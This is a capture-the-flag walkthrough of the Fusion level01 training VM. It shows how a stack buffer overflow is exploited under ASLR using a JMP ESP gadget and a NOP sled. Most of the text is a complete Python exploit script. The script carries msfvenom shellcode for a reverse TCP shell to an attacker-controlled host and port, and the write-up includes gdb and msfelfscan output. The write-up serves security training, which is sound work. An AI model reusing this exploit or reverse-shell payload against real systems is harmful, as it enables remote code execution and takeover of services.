Level01 of Fusion is very similar to the level00, however we do not know the address of the buffer, and we have ASLR active. I used the python script from the previous exercise with the ret address of “\x42\x42\x42\x42”, started the application in gdb and crashed it, and checked the state of the registers.

ESP points to the address next to the ret address.

(gdb) x/16x $esp-4
0xbffff34c: 0x42424242 0x43434343 0x43434343 0x43434343
0xbffff35c: 0x43434343 0x43434343 0x43434343 0x43434343

 

I searched for JMP ESP instruction with msfelfscan.

fusion@fusion:~$ /opt/metasploit-framework/msfelfscan -j esp /opt/fusion/bin/level01
[/opt/fusion/bin/level01]
0x08049f4f jmp esp

I updated the ret address and placed an INT 3 instruction (“\xcc”) after it. If I am correct, the execution will stop.

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 5122]
0xbffff351 in ?? ()

 

It worked as expected. Finally I added the shellcode to the python script. However the shellcode did not work. The problem was that I used shikata encoder and ESP and EIP was almost the same. This might cause problems if we execute instructions which modifies the stack, because this modifies the instructions we currently execute. The easiest solution is adding several NOP instructions.

The final solution:

level01.py

#!/usr/bin/env python

import socket
import struct

IP="172.16.184.163"
PORT=20001


# msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.184.1 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
# Found 10 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 95 (iteration=0)
# x86/shikata_ga_nai chosen with final size 95
# Payload size: 95 bytes
# Final size of python file: 470 bytes

buf =  ""
buf += "\xbe\xbb\xc6\x57\x61\xd9\xed\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x12\x83\xef\xfc\x31\x77\x0e\x03\xcc\xc8\xb5"
buf += "\x94\x03\x0e\xce\xb4\x30\xf3\x62\x51\xb4\x7a\x65\x15"
buf += "\xde\xb1\xe6\xc5\x47\xfa\xd8\x24\xf7\xb3\x5f\x4e\x9f"
buf += "\xef\xb0\x08\x5e\x98\xb2\x68\x71\x04\x3a\x89\xc1\xd2"
buf += "\x6c\x1b\x72\xa8\x8e\x12\x95\x03\x10\x76\x3d\xf2\x3e"
buf += "\x04\xd5\x62\x6e\xc5\x47\x1a\xf9\xfa\xd5\x8f\x70\x1d"
buf += "\x69\x24\x4e\x5e"


# 0x08049f4f jmp esp
path = "A"*139 + "\x4f\x9f\x04\x08" + "\x90"*32 + buf


# Create client socket and connect to the IP/PORT
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((IP, PORT))

# Send data to the server
s1.send("GET " + path + " HTTP/1.1")

# Close the socket
s1.close()

screen-shot-2016-12-15-at-23-55-17